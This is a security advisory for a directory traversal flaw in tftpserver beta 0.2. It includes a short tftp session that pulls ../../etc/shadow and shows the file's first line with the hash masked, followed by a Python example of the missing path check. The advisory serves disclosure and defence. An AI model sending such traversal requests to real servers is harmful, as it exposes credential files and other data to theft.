Open tftpserver path traversal vulnerability

2018.10.02
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Title: Open tftpserver path traversal vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2006-03-24
Download Site: http://sourceforge.net/projects/tftp-server/
Vendor: achaldhir
Vendor Notified: 2006-03-24
Vendor Contact: http://sourceforge.net/u/achaldhir/profile/
Advisory: http://www.vapid.dhs.org/advisories/tftpserver_dot_dot_vulnerability.html

Description: MultiThreaded TFTP Server, Open Source Freeware for Windows/Unix, for PXEBOOT and firmware load; supports tsize, blksize, timeout, server port ranges and block number rollover for large files. Runs as a service/daemon. A single-port version is also available.

Vulnerability: tftpserver beta 0.2 is vulnerable to directory traversal (../) because it does not sanitize the filename supplied in the client's request, so a relative path can reach files outside the TFTP root directory.

Exploit Code:
root@pangea:/home/done/tftpserver# tftp 192.168.0.26
tftp> get ../../etc/shadow
Received 652 bytes in 0.0 seconds
tftp> quit
root@debian:/home/done/tftpserver# head shadow
root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::
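The missing check, as an added illustration and not code from the tftpserver project or the advisory: a TFTP read/write handler should resolve the requested filename against its root directory and refuse anything that does not stay inside it. The function and helper names below (resolve_tftp_path, TftpAccessError, demo) and the constructed root directory are assumptions for this example; realpath() is used so that a symlink inside the root pointing outside is caught as well as a literal "../".

```python
import os
import tempfile


class TftpAccessError(Exception):
    """Raised when a requested filename would leave the TFTP root."""


def resolve_tftp_path(root: str, requested: str) -> str:
    """Return the absolute path to serve, or raise TftpAccessError."""
    # Treat backslashes as separators too: a Windows build of a server accepts both.
    name = requested.replace("\\", "/")
    if not name:
        raise TftpAccessError("empty filename refused")
    # Refuse absolute paths outright ("/etc/shadow", "C:/boot.ini").
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise TftpAccessError(f"absolute path refused: {requested!r}")
    # Refuse any '..' component before touching the filesystem at all.
    if any(part == ".." for part in name.split("/")):
        raise TftpAccessError(f"parent reference refused: {requested!r}")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, name))
    # realpath() follows symlinks, so a link inside the root that points
    # outside it also fails this containment test.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TftpAccessError(f"escapes TFTP root: {requested!r}")
    return candidate


def demo() -> dict:
    """Build a throwaway TFTP root (constructed sample) and classify requests."""
    root = tempfile.mkdtemp(prefix="tftproot-")
    with open(os.path.join(root, "pxelinux.0"), "wb") as fh:
        fh.write(b"\x00")
    try:  # symlink to the parent of the root: a constructed escape hatch
        os.symlink(os.path.dirname(root), os.path.join(root, "escape"))
    except OSError:
        pass  # platforms without symlink support simply skip that case
    requests = ["pxelinux.0", "../../etc/shadow", "..\\..\\etc\\shadow",
                "/etc/shadow", "escape/shadow"]
    results = {}
    for req in requests:
        try:
            resolve_tftp_path(root, req)
            results[req] = "allowed"
        except TftpAccessError:
            results[req] = "refused"
    return results
```

Only the legitimate boot file is served; the traversal from the advisory, its backslash variant, an absolute path and a symlink escape are all refused.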

References:

http://www.vapidlabs.com/advisory.php?v=46

